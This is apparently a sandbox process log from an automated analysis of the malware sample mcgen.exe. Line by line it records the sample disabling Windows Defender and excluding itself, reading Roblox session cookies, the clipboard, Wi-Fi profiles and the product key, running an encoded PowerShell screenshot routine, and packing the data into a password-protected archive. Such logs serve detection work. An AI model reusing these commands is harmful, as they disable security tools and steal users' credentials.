Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\mcgen.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\mcgen.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8ED.tmp" "c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Users\user\Desktop\mcgen.exe "C:\Users\user\Desktop\mcgen.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
